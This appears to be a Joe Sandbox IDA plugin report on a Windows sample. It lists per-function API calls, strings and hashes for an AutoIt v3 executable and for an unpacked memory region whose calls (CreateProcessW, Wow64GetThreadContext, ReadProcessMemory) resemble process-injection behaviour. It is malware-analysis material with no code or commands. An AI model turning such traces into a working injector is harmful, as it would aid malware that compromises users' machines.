CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00669511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00669522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00669534

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 8431a4947d3a3ed6b32bf7fc9fe742e592fe7d484edf245d510e077d7a553c5b
Instruction ID: 77e67e22380e840cf1a5180112e477eeddf1319f16a4a81d1096e97ddc25eea7
Opcode Fuzzy Hash: 8431a4947d3a3ed6b32bf7fc9fe742e592fe7d484edf245d510e077d7a553c5b
Instruction Fuzzy Hash: 3FC15FB1D00229ABDF61DFA5CC81ADEB7BEEF45310F0040AAF609E7241DB309A458F65

Function 0060301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00603074
RegisterClassExW.USER32(00000030), ref: 0060309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
InitCommonControlsEx.COMCTL32(?), ref: 006030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
LoadIconW.USER32(000000A9), ref: 006030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101

Strings

AutoIt v3 GUI, xrefs: 00603090
TaskbarCreated, xrefs: 006030A4
+, xrefs: 0060305D
0, xrefs: 00603056

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a0915962a5d928fc5696f11739a0bf0a4a5a846195180f5c48b435a74df926e2
Instruction ID: 37c40da23bd3bd447d55fd5ccb60959001ef5b2a78e8f226da2e484d5d7e2058
Opcode Fuzzy Hash: a0915962a5d928fc5696f11739a0bf0a4a5a846195180f5c48b435a74df926e2
Instruction Fuzzy Hash: 733149B1851358EFEB009FA4EC45AE9BFF2FB09310F14526AE541EA2A0D3B51585CF91

Function 00603041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00603074
RegisterClassExW.USER32(00000030), ref: 0060309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
InitCommonControlsEx.COMCTL32(?), ref: 006030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
LoadIconW.USER32(000000A9), ref: 006030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101

Strings

AutoIt v3 GUI, xrefs: 00603090
TaskbarCreated, xrefs: 006030A4
+, xrefs: 0060305D
0, xrefs: 00603056

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5938ad1dec13c2f01d68ecede00c5ab9cb534a0348435ccbc382a1cdd00c90b8
Instruction ID: edf04f397e038d64fa08b6ae38f1431ec09050ddde90c9834a35f6953656c5a6
Opcode Fuzzy Hash: 5938ad1dec13c2f01d68ecede00c5ab9cb534a0348435ccbc382a1cdd00c90b8
Instruction Fuzzy Hash: 7821C7B1952218AFEB00DFA4EC49B9DBBF6FB08710F10522AF512A62A0D7B555848F91

Function 0060708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00604706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C52F8,?,006037AE,?), ref: 00604724

Part of subcall function 0062050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00607165), ref: 0062052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0063E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063E909
RegCloseKey.ADVAPI32(?), ref: 0063E947
_wcscat.LIBCMT ref: 0063E9A0

Strings

\, xrefs: 0063E9C3
\Include\, xrefs: 00607165
Include, xrefs: 0063E8BF, 0063E900
Software\AutoIt v3\AutoIt, xrefs: 0060719E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b5deaed022902a1fe8ce94ef7d8daca53b0bfc23a835876079b24d8ba9f57ddd
Instruction ID: 8bcb9f8849c7ec7d84082cad0ced5c78bb8e11d3bce81281690a5dc3f380d5d9
Opcode Fuzzy Hash: b5deaed022902a1fe8ce94ef7d8daca53b0bfc23a835876079b24d8ba9f57ddd
Instruction Fuzzy Hash: 90718171548301AEC744EF25EC41DABBBEAFF84350F40152EF445872E1DB75AA48CBAA

Function 00603633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006036D2
KillTimer.USER32(?,00000001), ref: 006036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0060371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060372A
CreatePopupMenu.USER32 ref: 0060373E
PostQuitMessage.USER32(00000000), ref: 0060374D

Strings

%i, xrefs: 0063D081, 0063D0CF
TaskbarCreated, xrefs: 00603725

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%i
API String ID: 129472671-2085807306
Opcode ID: 6e5bc1647bcabc62c80789a7e6310fc2ac87b49e697b2e8678a9c01edee7b352
Instruction ID: e1cd22a806b8c7392586b0b883dc921547d3669dde2feed65b6a5a4d5e67f424
Opcode Fuzzy Hash: 6e5bc1647bcabc62c80789a7e6310fc2ac87b49e697b2e8678a9c01edee7b352
Instruction Fuzzy Hash: E5417DB1190515BBDB1C5F68EC09FBB379FEB00302F500129F603863E1DB66AE819369

Function 00603A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00603A50
LoadCursorW.USER32(00000000,00007F00), ref: 00603A5F
LoadIconW.USER32(00000063), ref: 00603A76
LoadIconW.USER32(000000A4), ref: 00603A88
LoadIconW.USER32(000000A2), ref: 00603A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AC0
RegisterClassExW.USER32(?), ref: 00603B16

Part of subcall function 00603041: GetSysColorBrush.USER32(0000000F), ref: 00603074
Part of subcall function 00603041: RegisterClassExW.USER32(00000030), ref: 0060309E
Part of subcall function 00603041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
Part of subcall function 00603041: InitCommonControlsEx.COMCTL32(?), ref: 006030CC
Part of subcall function 00603041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
Part of subcall function 00603041: LoadIconW.USER32(000000A9), ref: 006030F2
Part of subcall function 00603041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101

Strings

0, xrefs: 00603AF4
AutoIt v3, xrefs: 00603B05
#, xrefs: 00603AFB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 457e9eed8493ea68dde40fd7a5523a3ed7c229317f8864a038fead85a347e2ae
Instruction ID: 3491588a668bc780acdaea0ba6a30cdcaed9a37d9e277c7e2899705a4e46b949
Opcode Fuzzy Hash: 457e9eed8493ea68dde40fd7a5523a3ed7c229317f8864a038fead85a347e2ae
Instruction Fuzzy Hash: 90212E71D40304AFEB10DFA4EC49FAD7BF6FB08711F105119F505A62A1D7B9A6908F94

Function 00603766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3OutputDebug, xrefs: 00603892
/AutoIt3ExecuteScript, xrefs: 006038BC
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 006037AE
CMDLINERAW, xrefs: 006037FB
CMDLINE, xrefs: 00603822
Rl, xrefs: 0063D213
/ErrorStdOut, xrefs: 0060387D
/AutoIt3ExecuteLine, xrefs: 006038A7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rl
API String ID: 1825951767-3520598783
Opcode ID: b89c835fdfb5319d08536a80babaab7a41198ec219d5d8d7afe5a06883e28cb4
Instruction ID: c3a5acd3c5c7751da11e1bb857fafbc2d5a1b1cdb47e3d342740d95439a0d1c0
Opcode Fuzzy Hash: b89c835fdfb5319d08536a80babaab7a41198ec219d5d8d7afe5a06883e28cb4
Instruction Fuzzy Hash: 71A13C7195022D9ACB48EBA4DC51EEFB77ABF14310F40052EE416A72D1EF746A08CBA4

Function 0060F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00620162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620193
Part of subcall function 00620162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0062019B
Part of subcall function 00620162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006201A6
Part of subcall function 00620162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006201B1
Part of subcall function 00620162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006201B9
Part of subcall function 00620162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006201C1

Part of subcall function 006160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0060F930), ref: 00616154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0060F9CD
OleInitialize.OLE32(00000000), ref: 0060FA4A
CloseHandle.KERNEL32(00000000), ref: 006445C8

Strings

%i, xrefs: 0060F796, 0060F7A8, 0060F96E, 0060FA51
Sl, xrefs: 0060F7EB
<Wl, xrefs: 0060F930
\Tl, xrefs: 0060F7F7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <Wl$\Tl$%i$Sl
API String ID: 1986988660-2472473219
Opcode ID: b201fe5f77d9319a676381de6f2905f4d54d3793c5e2af536b6f5160c6fa71cf
Instruction ID: e6efaa9157eca8fa1ea4fedab725c29b4e54f563c7f075e6876624babcc4f13d
Opcode Fuzzy Hash: b201fe5f77d9319a676381de6f2905f4d54d3793c5e2af536b6f5160c6fa71cf
Instruction Fuzzy Hash: 2B81A0B0911A80CFC388DF29AD44E797BE7EB98306790A12ED01BCB261E77464C58F55

Function 01644350 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01644421
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01644647

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: f403300bdf574c72eadf31914e9693ec18005f5b31060cac8a6a038fe2b000e7
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 43A11774E01209EBDF14DFA4C895BEEBBB5FF48305F208159E605BB281CB759A81CB94

Function 006039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A24
ShowWindow.USER32(00000000,?,?), ref: 00603A38
ShowWindow.USER32(00000000,?,?), ref: 00603A41

Strings

edit, xrefs: 00603A1E
AutoIt v3, xrefs: 006039FB, 00603A00, 00603A01

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ca99671675596bed7c1346a4890a48cd3b5c971d3db77a522a3c42b059aa99e6
Instruction ID: f7f77f465e31454af1a6bfa20a408baf04b28c0a9eed556a7d60f5742e992bc7
Opcode Fuzzy Hash: ca99671675596bed7c1346a4890a48cd3b5c971d3db77a522a3c42b059aa99e6
Instruction Fuzzy Hash: F2F03A70500290BEEB305B23AC48E3B3EBFD7C6F50B00112AB901A2170C2792881CAB0

Function 01644110 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01644000: Sleep.KERNELBASE(000001F4), ref: 01644011

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01644249

Strings

QIKJX1T00FUIU8JB71I6LS, xrefs: 016442AC, 016442AF

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID: CreateFileSleep
String ID: QIKJX1T00FUIU8JB71I6LS
API String ID: 2694422964-3138833913
Opcode ID: f476498908c463afa5a012177e49fa1769d6e7c30b2503e2230fb575e4feeb4c
Instruction ID: 8f062fbce199b2a1eb7763e95c7d8562a6c062ffa054c6dd6e95f0a8e07acdea
Opcode Fuzzy Hash: f476498908c463afa5a012177e49fa1769d6e7c30b2503e2230fb575e4feeb4c
Instruction Fuzzy Hash: C751A430D04248DBEF11DBA4D855BEFBB79AF19700F004199E249BB2C1DBB90B45CBA5

Function 0060407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0063D3D7

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

_memset.LIBCMT ref: 006040FC
_wcscpy.LIBCMT ref: 00604150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00604160

Strings

Line: , xrefs: 0063D400

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 8fcdf3d3be440f6344264514380b49bc57e439d035e9406e1b1e1d96baace58e
Instruction ID: 3863b888ffb938413e797e38b48e6b09b910944306a90016435cff9781b68be6
Opcode Fuzzy Hash: 8fcdf3d3be440f6344264514380b49bc57e439d035e9406e1b1e1d96baace58e
Instruction Fuzzy Hash: 1E31D2B14487016ED378EB60DC45FEB77DAAF40304F10491EF686921D1EF74A688CB86

Function 0062541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062547B
_memcpy_s.LIBCMT ref: 006254ED
__read_nolock.LIBCMT ref: 0062554B
__filbuf.LIBCMT ref: 0062556E
_memset.LIBCMT ref: 006255B2

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 571237b4268a04192b08fc2eda6ab1a364195af063b9fc674ea3af0558964f22
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: F051A470A00F25DBDB349E69E8806AEB7A7AF40325F24872DF826A63D0D7709D518F41

Function 0060686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00604DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E0F

_free.LIBCMT ref: 0063E263
_free.LIBCMT ref: 0063E2AA

Part of subcall function 00606A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0063E039
Bad directive syntax error, xrefs: 0063E292

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: b5560e605b5aa0b740f0e268675b6b6cd853edeac86a2637c5c7ef1a21770fa6
Instruction ID: 0c07e3bf11481df0eb78868996a15fabd6666522006a6e1113e8057df9173df8
Opcode Fuzzy Hash: b5560e605b5aa0b740f0e268675b6b6cd853edeac86a2637c5c7ef1a21770fa6
Instruction Fuzzy Hash: 05916D719102199FCF48EFA4CC519EEB7BAFF14310F10442EE816AB2E1DB71A955CBA4

Function 006035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006035A1,SwapMouseButtons,00000004,?), ref: 006035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 006035F5
RegCloseKey.KERNELBASE(00000000,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 00603617

Strings

Control Panel\Mouse, xrefs: 006035D2

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
Instruction ID: 7e9163d595a6ba6cd7ec6ab4840e6cae6fe1b5410c1f754977c7b8824851b7d2
Opcode Fuzzy Hash: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
Instruction Fuzzy Hash: 83114871560228BFDB248F64DC409EFB7BEEF04741F105569E805D7350D6729E409760

Function 01643000 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016437BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01643851
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01643873

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
